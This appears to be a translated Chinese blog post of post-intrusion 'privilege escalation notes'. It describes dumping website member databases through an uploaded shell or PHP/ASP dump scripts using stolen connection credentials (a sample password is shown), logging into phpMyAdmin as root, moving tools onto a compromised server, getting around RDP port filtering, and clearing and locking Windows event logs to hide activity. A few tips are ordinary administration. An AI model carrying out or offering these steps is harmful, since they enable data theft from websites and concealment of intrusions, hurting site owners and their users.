Dumping an Access database is very simple: download the database file directly. For an MSSQL database, use the dump function provided by the shell or an ASP dump script; find the file holding the database connection information, such as web.config.
Log in to the ASP dump script with the account and password, find the management table, find the member table (UserInfo) and export it. For a MySQL database a PHP script is usually used; find the website's database connection information:
'host'=>'localhost:3306', database address
'user'=>'iweb', user
'passwd'=>'nnY5bvRNnJ4vKpmb', password
'name'=>'iwebshop', database name
Then upload the PHP dump script. In the dump interface there is a database selector on the left; here it is iwebshop. After selecting the database a table list appears; click the table you want, then click select data.
Import means import and Export means export. For dumping we of course select Export, then Save, then click Export to start dumping.
If phpMyAdmin is installed on the server, you can also find its page, log in with the root account and password just found, and dump from there just as with an uploaded PHP dump script.
 
 
[Server]
The command prompt has been disabled by the system administrator?
Solution: Run, gpedit.msc, User Configuration, Administrative Templates, System; find "Prevent access to the command prompt" on the right, double-click it, select "Not Configured", and click OK.

How to determine the server's operating system?
Solution: ping the server IP and look at the TTL in the reply:
TTL=32     9X/ME
TTL=64     linux
TTL=128    2000X/XP
TTL=255    UNIX

Why is 3389 sometimes open but not connectable?
Cause: sometimes the firewall forwards 3389 to another port; when it still cannot connect after forwarding, the administrator has set port restrictions in TCP/IP filtering.
Solution: change the port to one of the ports allowed by the TCP/IP filter. A better solution is to remove the port restriction.

What is the easiest way to upload something to the server?
Open the "HFS network file server" tool on your own machine, drag the tool to upload into the first box on the left, copy the address shown at the top, open it in a browser on the server, and download it.

Restrict permission to run the command prompt?
Right-click My Computer, open Explorer, click the "Tools" menu, choose "Folder Options", switch to the "View" tab and clear "Use simple file sharing (Recommended)". This makes the "Security" tab appear in file properties. Then go to c:\windows\system32, find cmd.exe, right-click "Properties", switch to the "Security" tab, remove all users except the administrator from "Group or user names", and click OK. When an ordinary user tries to run the command prompt, an "Access Denied" box appears.

How to change the maximum number of connections in Windows 2003?
Remote Desktop in Windows 2003 is very convenient, but the initial setting allows only two users to log in at the same time. Sometimes I am disconnected after logging in from the company, a colleague is disconnected after logging in from home, and when I connect again it reports "the terminal server has exceeded the maximum number of allowed connections". Then neither my colleague nor I can log in. Increase the number of connections as follows: run services.msc and enable License Logging. Do not forget to disable License Logging after adding.
Open "Licensing" in the Windows 2003 Control Panel, click "Add Licenses" and enter the number of connections to change.

How to clear the IP logs on the server?
1. Right-click My Computer, Manage, Event Viewer, Security, right-click and clear all events.
2. Open My Computer, C drive, Windows, system32, config, AppEvent.Evt, Properties, Security, Deny All.
3. Klaklog.evt, Properties, Security, Deny All; SecEvent.Evt, Properties, Security, Deny All.
Please retain the copyright information when reprinting: Maoke Studio

Reprints of this original article must state: reprinted from Seven Travelers Blog

Permalink: https://www.qxzxp.com/4013.html

Jianmei Daxia's privilege escalation notes: 1 comment

Brother Paoju:

A little dizzy....

2014-08-26 20:47